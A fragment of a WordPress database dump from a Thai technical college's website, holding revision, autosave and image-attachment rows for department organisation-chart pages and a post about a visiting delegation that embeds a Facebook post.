(3391, 3, '2018-07-10 10:36:19', '2018-07-10 03:36:19', '<img class=\"aligncenter wp-image-1454 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-23-29.jpg\" alt=\"\" width=\"190\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1452 \" src=\"/wp-content/uploads/2018/03/นายกิตติพงค์-อุตตมะเวทิน.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1485 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1456\" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /></a><a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-2067 size-full\" src=\"/wp-content/uploads/2018/05/2-5-2561-13-59-36-2.jpg\" alt=\"\" width=\"913\" height=\"318\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-3379\" src=\"/wp-content/uploads/2018/07/10-7-2561-10-06-54.jpg\" alt=\"\" width=\"371\" height=\"101\" /> <img class=\"aligncenter size-full wp-image-3386\" src=\"/wp-content/uploads/2018/07/10-7-2561-10-29-52.jpg\" alt=\"\" width=\"691\" height=\"331\" />\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1600 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-06-42.jpg\" alt=\"\" width=\"196\" height=\"244\" /></a>\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1473\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-34-40.jpg\" alt=\"\" width=\"375\" height=\"100\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1590 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-44-12.jpg\" alt=\"\" width=\"675\" height=\"311\" />\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1603 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-11-03.jpg\" alt=\"\" width=\"193\" height=\"239\" /></a>\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1478\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-52-08.jpg\" alt=\"\" width=\"375\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1592 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"455\" height=\"323\" />\r\n\r\n<img class=\"aligncenter wp-image-3382\" src=\"/wp-content/uploads/2018/07/145623013221.jpg\" alt=\"\" width=\"370\" height=\"101\" /> <img class=\"aligncenter wp-image-3383 size-full\" src=\"/wp-content/uploads/2018/07/10-7-2561-10-25-00.jpg\" alt=\"\" width=\"780\" height=\"645\" />\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1614 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-37-08.jpg\" alt=\"\" width=\"194\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1493\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-41.jpg\" alt=\"\" width=\"382\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter size-full wp-image-3388\" src=\"/wp-content/uploads/2018/07/10-7-2561-10-33-19.jpg\" alt=\"\" width=\"279\" height=\"339\" />\r\n<h6><a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1619 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-46-48.jpg\" alt=\"\" width=\"193\" height=\"238\" /></a><a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1496\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg\" alt=\"\" width=\"384\" height=\"105\" /></a></h6>\r\n<img class=\"aligncenter wp-image-1620 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-50-20.jpg\" alt=\"\" width=\"743\" height=\"630\" />\r\n\r\n<a href=\"/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1623 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-12-02.jpg\" alt=\"\" width=\"195\" height=\"241\" /></a>\r\n\r\n<a href=\"/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1503\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-34-49.jpg\" alt=\"\" width=\"362\" height=\"98\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1626 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-17-46.jpg\" alt=\"\" width=\"244\" height=\"311\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-07-10 10:36:19', '2018-07-10 03:36:19', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
(3392, 3, '2018-07-10 10:41:56', '2018-07-10 03:41:56', '<img class=\"aligncenter size-full wp-image-1638\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-49-01.jpg\" alt=\"\" width=\"194\" height=\"241\" />\n\n<img class=\"aligncenter wp-image-1639\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-49-18-300x80.jpg\" alt=\"\" width=\"376\" height=\"100\" />\n\n<img class=\"aligncenter size-full wp-image-3393\" src=\"/wp-content/uploads/2018/07/65424786453.jpg\" alt=\"\" width=\"228\" height=\"333\" />\n\n ', 'งานความร่วมมือ', '', 'inherit', 'closed', 'closed', '', '1745-autosave-v1', '', '', '2018-07-10 10:41:56', '2018-07-10 03:41:56', '', 1745, 'http://www.technicrayong.ac.th/1745-autosave-v1/', 0, 'revision', '', 0),
(3393, 3, '2018-07-10 10:41:31', '2018-07-10 03:41:31', '', '6+5424786453', '', 'inherit', 'closed', 'closed', '', '65424786453', '', '', '2018-07-10 10:41:31', '2018-07-10 03:41:31', '', 1745, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/65424786453.jpg', 0, 'attachment', 'image/jpeg', 0),
(3394, 3, '2018-07-10 10:41:47', '2018-07-10 03:41:47', '<img class=\"aligncenter size-full wp-image-1638\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-49-01.jpg\" alt=\"\" width=\"194\" height=\"241\" />\r\n\r\n<img class=\"aligncenter wp-image-1639\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-49-18-300x80.jpg\" alt=\"\" width=\"376\" height=\"100\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-3393\" src=\"/wp-content/uploads/2018/07/65424786453.jpg\" alt=\"\" width=\"228\" height=\"333\" />\r\n\r\n ', 'งานความร่วมมือ', '', 'inherit', 'closed', 'closed', '', '1745-revision-v1', '', '', '2018-07-10 10:41:47', '2018-07-10 03:41:47', '', 1745, 'http://www.technicrayong.ac.th/1745-revision-v1/', 0, 'revision', '', 0),
(3395, 3, '2018-07-10 10:46:48', '2018-07-10 03:46:48', '<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-2797\" src=\"/wp-content/uploads/2018/05/30-5-2561-9-22-41.jpg\" alt=\"\" width=\"192\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1631 \" src=\"/wp-content/uploads/2018/03/7-3-2561-14-39-06.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<a href=\"/%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%A7%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B8%87%E0%B8%9A%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%A1%E0%B8%B2%E0%B8%93/\"><img class=\"aligncenter wp-image-1632 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-34-46.jpg\" alt=\"\" width=\"193\" height=\"246\" /></a>\r\n\r\n<a href=\"/งานวางแผนและความร่วมมื\"><img class=\"aligncenter wp-image-1633\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-39-27.jpg\" alt=\"\" width=\"375\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1654 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-24-55.jpg\" alt=\"\" width=\"246\" height=\"308\" />\r\n\r\n<a href=\"/%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%A8%E0%B8%B9%E0%B8%99%E0%B8%A2%E0%B9%8C%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5/\"><img class=\"aligncenter wp-image-2799 size-full\" src=\"/wp-content/uploads/2018/05/30-5-2561-9-51-29.jpg\" alt=\"\" width=\"192\" height=\"239\" /></a>\r\n\r\n<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<a href=\"/%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%A8%E0%B8%B9%E0%B8%99%E0%B8%A2%E0%B9%8C%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5/\"><img class=\"aligncenter wp-image-1635\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-43-12-300x79.jpg\" alt=\"\" width=\"376\" height=\"99\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1655 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-25-12.jpg\" alt=\"\" width=\"306\" height=\"334\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1638\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-49-01.jpg\" alt=\"\" width=\"194\" height=\"241\" />\r\n\r\n<img class=\"aligncenter wp-image-1639\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-49-18-300x80.jpg\" alt=\"\" width=\"376\" height=\"100\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-3393\" src=\"/wp-content/uploads/2018/07/65424786453.jpg\" alt=\"\" width=\"228\" height=\"333\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1642\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-57-37.jpg\" alt=\"\" width=\"202\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1643\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-53-30-300x81.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter size-medium wp-image-1657\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-26-35-223x300.jpg\" alt=\"\" width=\"223\" height=\"300\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1646\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-21.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1647\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-34-300x80.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1648 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-05-03.jpg\" alt=\"\" width=\"506\" height=\"323\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1652\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-22-50.jpg\" alt=\"\" width=\"191\" height=\"237\" />\r\n\r\n<img class=\"aligncenter wp-image-1650\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-21-54-300x81.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1755 size-full\" src=\"/wp-content/uploads/2018/03/12-3-2561-14-57-21.jpg\" alt=\"\" width=\"574\" height=\"318\" />\r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายแผนงานและความร่วมมือ', '', 'inherit', 'closed', 'closed', '', '1588-revision-v1', '', '', '2018-07-10 10:46:48', '2018-07-10 03:46:48', '', 1588, 'http://www.technicrayong.ac.th/1588-revision-v1/', 0, 'revision', '', 0),
(3397, 3, '2018-07-10 10:54:57', '2018-07-10 03:54:57', '', '10-7-2561 10-56-29', '', 'inherit', 'closed', 'closed', '', '10-7-2561-10-56-29', '', '', '2018-07-10 10:54:57', '2018-07-10 03:54:57', '', 1784, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/10-7-2561-10-56-29.jpg', 0, 'attachment', 'image/jpeg', 0),
(3398, 3, '2018-07-10 10:55:13', '2018-07-10 03:55:13', '<img class=\"aligncenter size-full wp-image-1766\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-01-14.jpg\" alt=\"\" width=\"190\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1767\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-07-18-300x84.jpg\" alt=\"\" width=\"376\" height=\"105\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-3397\" src=\"/wp-content/uploads/2018/07/10-7-2561-10-56-29.jpg\" alt=\"\" width=\"735\" height=\"324\" />\r\n<h3><span style=\"color: #0000ff;\">แบบฟอร์ม บันทึกข้อความขอดำเนินโครงการ >> <span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"/wp-content/uploads/2018/05/บันทึกข้อความขอดำเนินโครงการเปล่า.pdf\">ไฟล์ PDF</a></span><< >><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/บันทึกข้อความขอดำเนินโครงการเปล่า.docx\"><span style=\"color: #ff0000;\">ไฟล์ Word</span><<</a></span></h3>', 'งานกิจกรรมนักเรียน นักศึกษา', '', 'inherit', 'closed', 'closed', '', '1784-revision-v1', '', '', '2018-07-10 10:55:13', '2018-07-10 03:55:13', '', 1784, 'http://www.technicrayong.ac.th/1784-revision-v1/', 0, 'revision', '', 0),
(3399, 3, '2018-07-10 10:59:52', '2018-07-10 03:59:52', '<img class=\"aligncenter size-full wp-image-1775\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-02-32.jpg\" alt=\"\" width=\"194\" height=\"239\" />\n\n<img class=\"aligncenter wp-image-1776\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-12-21-300x83.jpg\" alt=\"\" width=\"376\" height=\"104\" />\n\n<img class=\"aligncenter size-full wp-image-3400\" src=\"/wp-content/uploads/2018/07/10-7-2561-11-01-05.jpg\" alt=\"\" width=\"439\" height=\"329\" />', 'งานแนะแนวอาชีพและการจัดหางาน', '', 'inherit', 'closed', 'closed', '', '1790-autosave-v1', '', '', '2018-07-10 10:59:52', '2018-07-10 03:59:52', '', 1790, 'http://www.technicrayong.ac.th/1790-autosave-v1/', 0, 'revision', '', 0),
(3400, 3, '2018-07-10 10:59:28', '2018-07-10 03:59:28', '', '10-7-2561 11-01-05', '', 'inherit', 'closed', 'closed', '', '10-7-2561-11-01-05', '', '', '2018-07-10 10:59:28', '2018-07-10 03:59:28', '', 1790, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/10-7-2561-11-01-05.jpg', 0, 'attachment', 'image/jpeg', 0),
(3401, 3, '2018-07-10 10:59:44', '2018-07-10 03:59:44', '<img class=\"aligncenter size-full wp-image-1775\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-02-32.jpg\" alt=\"\" width=\"194\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1776\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-12-21-300x83.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-3400\" src=\"/wp-content/uploads/2018/07/10-7-2561-11-01-05.jpg\" alt=\"\" width=\"439\" height=\"329\" />', 'งานแนะแนวอาชีพและการจัดหางาน', '', 'inherit', 'closed', 'closed', '', '1790-revision-v1', '', '', '2018-07-10 10:59:44', '2018-07-10 03:59:44', '', 1790, 'http://www.technicrayong.ac.th/1790-revision-v1/', 0, 'revision', '', 0),
(3402, 3, '2018-07-10 11:06:20', '2018-07-10 04:06:20', '<img class=\"aligncenter size-full wp-image-1800\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-03-05-1.jpg\" alt=\"\" width=\"192\" height=\"237\" />\n\n<img class=\"aligncenter wp-image-1798\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-28-10-1-300x85.jpg\" alt=\"\" width=\"376\" height=\"106\" />\n\n<img class=\"aligncenter size-full wp-image-3403\" src=\"/wp-content/uploads/2018/07/10-7-2561-11-07-53.jpg\" alt=\"\" width=\"486\" height=\"324\" />', 'งานโครงการพิเศษและบริการชุมชน', '', 'inherit', 'closed', 'closed', '', '1797-autosave-v1', '', '', '2018-07-10 11:06:20', '2018-07-10 04:06:20', '', 1797, 'http://www.technicrayong.ac.th/1797-autosave-v1/', 0, 'revision', '', 0),
(3403, 3, '2018-07-10 11:05:44', '2018-07-10 04:05:44', '', '10-7-2561 11-07-53', '', 'inherit', 'closed', 'closed', '', '10-7-2561-11-07-53', '', '', '2018-07-10 11:05:44', '2018-07-10 04:05:44', '', 1797, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/10-7-2561-11-07-53.jpg', 0, 'attachment', 'image/jpeg', 0),
(3404, 3, '2018-07-10 11:06:15', '2018-07-10 04:06:15', '<img class=\"aligncenter size-full wp-image-1800\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-03-05-1.jpg\" alt=\"\" width=\"192\" height=\"237\" />\r\n\r\n<img class=\"aligncenter wp-image-1798\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-28-10-1-300x85.jpg\" alt=\"\" width=\"376\" height=\"106\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-3403\" src=\"/wp-content/uploads/2018/07/10-7-2561-11-07-53.jpg\" alt=\"\" width=\"486\" height=\"324\" />', 'งานโครงการพิเศษและบริการชุมชน', '', 'inherit', 'closed', 'closed', '', '1797-revision-v1', '', '', '2018-07-10 11:06:15', '2018-07-10 04:06:15', '', 1797, 'http://www.technicrayong.ac.th/1797-revision-v1/', 0, 'revision', '', 0),
(3405, 3, '2018-07-10 11:11:46', '2018-07-10 04:11:46', '<img class=\"aligncenter size-full wp-image-1765\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-00-36.jpg\" alt=\"\" width=\"192\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1764\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-07-01-300x80.jpg\" alt=\"\" width=\"376\" height=\"100\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1766\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-01-14.jpg\" alt=\"\" width=\"190\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1767\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-07-18-300x84.jpg\" alt=\"\" width=\"376\" height=\"105\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-3397\" src=\"/wp-content/uploads/2018/07/10-7-2561-10-56-29.jpg\" alt=\"\" width=\"735\" height=\"324\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1772\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-01-31.jpg\" alt=\"\" width=\"193\" height=\"240\" />\r\n\r\n<img class=\"aligncenter wp-image-1773\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-09-17-300x84.jpg\" alt=\"\" width=\"376\" height=\"105\" />\r\n\r\n<img class=\"aligncenter wp-image-1774 size-full\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-06-09.jpg\" alt=\"\" width=\"265\" height=\"326\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1769\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-01-47.jpg\" alt=\"\" width=\"193\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1770\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-09-38-300x82.jpg\" alt=\"\" width=\"376\" height=\"103\" />\r\n\r\n<img class=\"aligncenter wp-image-1771 size-full\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-11-58.jpg\" alt=\"\" width=\"824\" height=\"323\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1775\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-02-32.jpg\" alt=\"\" width=\"194\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1776\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-12-21-300x83.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-3400\" src=\"/wp-content/uploads/2018/07/10-7-2561-11-01-05.jpg\" alt=\"\" width=\"439\" height=\"329\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1793\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-02-47.jpg\" alt=\"\" width=\"192\" height=\"237\" />\r\n\r\n<img class=\"aligncenter wp-image-1794\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-19-24-300x85.jpg\" alt=\"\" width=\"376\" height=\"106\" />\r\n\r\n<img class=\"aligncenter wp-image-1795 size-full\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-27-05.jpg\" alt=\"\" width=\"494\" height=\"315\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1778\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-03-05.jpg\" alt=\"\" width=\"192\" height=\"237\" />\r\n\r\n<img class=\"aligncenter wp-image-1779\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-28-10-300x85.jpg\" alt=\"\" width=\"376\" height=\"106\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-3403\" src=\"/wp-content/uploads/2018/07/10-7-2561-11-07-53.jpg\" alt=\"\" width=\"486\" height=\"324\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายพัฒนากิจการนักเรียน นักศึกษา', '', 'inherit', 'closed', 'closed', '', '1762-revision-v1', '', '', '2018-07-10 11:11:46', '2018-07-10 04:11:46', '', 1762, 'http://www.technicrayong.ac.th/1762-revision-v1/', 0, 'revision', '', 0),
(3408, 3, '2018-07-11 16:20:06', '2018-07-11 09:20:06', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D621948571514668%26id%3D100010985913485&width=500\" width=\"500\" height=\"740\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ยินดีต้อนรับ คณะผู้บริหาร ครู บุคลากรทางการศึกษาจากวิทยาลัยเทคโนโลยีภาคตะวันออก(อี.เทค) เข้าศึกษาดูงานเกี่ยวกับศูนย์บ่มเพาะผู้ประกอบการ วิทยาลัยเทคนิคระยอง วันอังคารที่ 10 กรกฎาคม 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%a2%e0%b8%b4%e0%b8%99%e0%b8%94%e0%b8%b5%e0%b8%95%e0%b9%89%e0%b8%ad%e0%b8%99%e0%b8%a3%e0%b8%b1%e0%b8%9a-%e0%b8%84%e0%b8%93%e0%b8%b0%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab', '', '', '2018-07-11 16:20:06', '2018-07-11 09:20:06', '', 0, 'http://www.technicrayong.ac.th/?p=3408', 366, 'post', '', 0),
(3409, 3, '2018-07-11 16:18:36', '2018-07-11 09:18:36', '', '36923513_622727778103414_2237702695932657664_o', '', 'inherit', 'closed', 'closed', '', '36923513_622727778103414_2237702695932657664_o', '', '', '2018-07-11 16:18:36', '2018-07-11 09:18:36', '', 3408, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/36923513_622727778103414_2237702695932657664_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3410, 3, '2018-07-11 16:20:06', '2018-07-11 09:20:06', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D621948571514668%26id%3D100010985913485&width=500\" width=\"500\" height=\"740\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ยินดีต้อนรับ คณะผู้บริหาร ครู บุคลากรทางการศึกษาจากวิทยาลัยเทคโนโลยีภาคตะวันออก(อี.เทค) เข้าศึกษาดูงานเกี่ยวกับศูนย์บ่มเพาะผู้ประกอบการ วิทยาลัยเทคนิคระยอง วันอังคารที่ 10 กรกฎาคม 2561', '', 'inherit', 'closed', 'closed', '', '3408-revision-v1', '', '', '2018-07-11 16:20:06', '2018-07-11 09:20:06', '', 3408, 'http://www.technicrayong.ac.th/3408-revision-v1/', 0, 'revision', '', 0),
(3411, 3, '2018-07-11 16:20:15', '2018-07-11 09:20:15', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D621948571514668%26id%3D100010985913485&width=500\" width=\"500\" height=\"740\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ยินดีต้อนรับ คณะผู้บริหาร ครู บุคลากรทางการศึกษาจากวิทยาลัยเทคโนโลยีภาคตะวันออก(อี.เทค) เข้าศึกษาดูงานเกี่ยวกับศูนย์บ่มเพาะผู้ประกอบการ วิทยาลัยเทคนิคระยอง วันอังคารที่ 10 กรกฎาคม 2561', '', 'inherit', 'closed', 'closed', '', '3408-autosave-v1', '', '', '2018-07-11 16:20:15', '2018-07-11 09:20:15', '', 3408, 'http://www.technicrayong.ac.th/3408-autosave-v1/', 0, 'revision', '', 0),
(3412, 3, '2018-07-12 13:47:52', '2018-07-12 06:47:52', '<img class=\"aligncenter size-full wp-image-3413\" src=\"/wp-content/uploads/2018/07/12-7-2561-11-32-03.jpg\" alt=\"\" width=\"196\" height=\"243\" /> <img class=\"aligncenter wp-image-3414\" src=\"/wp-content/uploads/2018/07/12-7-2561-11-32-14.jpg\" alt=\"\" width=\"372\" height=\"101\" /> <img class=\"aligncenter size-full wp-image-3420\" src=\"/wp-content/uploads/2018/07/12-7-2561-13-57-34.jpg\" alt=\"\" width=\"881\" height=\"631\" />', 'วิทยาศาสตร์', '', 'publish', 'closed', 'closed', '', '%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b9%8c', '', '', '2018-07-12 14:26:04', '2018-07-12 07:26:04', '', 0, 'http://www.technicrayong.ac.th/?page_id=3412', 0, 'page', '', 0),
(3413, 3, '2018-07-12 13:39:56', '2018-07-12 06:39:56', '', '12-7-2561 11-32-03', '', 'inherit', 'closed', 'closed', '', '12-7-2561-11-32-03', '', '', '2018-07-12 13:39:56', '2018-07-12 06:39:56', '', 3412, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/12-7-2561-11-32-03.jpg', 0, 'attachment', 'image/jpeg', 0),
(3414, 3, '2018-07-12 13:40:01', '2018-07-12 06:40:01', '', '12-7-2561 11-32-14', '', 'inherit', 'closed', 'closed', '', '12-7-2561-11-32-14', '', '', '2018-07-12 13:40:01', '2018-07-12 06:40:01', '', 3412, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/12-7-2561-11-32-14.jpg', 0, 'attachment', 'image/jpeg', 0),
(3416, 3, '2018-07-12 13:47:52', '2018-07-12 06:47:52', '<img class=\"aligncenter size-full wp-image-3413\" src=\"/wp-content/uploads/2018/07/12-7-2561-11-32-03.jpg\" alt=\"\" width=\"196\" height=\"243\" /> <img class=\"aligncenter wp-image-3414\" src=\"/wp-content/uploads/2018/07/12-7-2561-11-32-14.jpg\" alt=\"\" width=\"372\" height=\"101\" /> <img class=\"aligncenter size-full wp-image-3415\" src=\"/wp-content/uploads/2018/07/12-7-2561-13-41-41.jpg\" alt=\"\" width=\"874\" height=\"624\" />', 'วิทยาศาสตร์', '', 'inherit', 'closed', 'closed', '', '3412-revision-v1', '', '', '2018-07-12 13:47:52', '2018-07-12 06:47:52', '', 3412, 'http://www.technicrayong.ac.th/3412-revision-v1/', 0, 'revision', '', 0),
(3418, 3, '2018-07-12 14:28:38', '2018-07-12 07:28:38', '<img class=\"aligncenter size-full wp-image-3422\" src=\"/wp-content/uploads/2018/07/12-7-2561-14-25-18.jpg\" alt=\"\" width=\"198\" height=\"245\" /> <img class=\"aligncenter wp-image-3423\" src=\"/wp-content/uploads/2018/07/12-7-2561-14-25-37.jpg\" alt=\"\" width=\"375\" height=\"101\" /> <img class=\"aligncenter size-full wp-image-3424\" src=\"/wp-content/uploads/2018/07/12-7-2561-14-26-57.jpg\" alt=\"\" width=\"876\" height=\"329\" />', 'คณิตศาสตร์', '', 'publish', 'closed', 'closed', '', '%e0%b8%84%e0%b8%93%e0%b8%b4%e0%b8%95%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b9%8c', '', '', '2018-07-12 14:28:38', '2018-07-12 07:28:38', '', 0, 'http://www.technicrayong.ac.th/?page_id=3418', 0, 'page', '', 0),
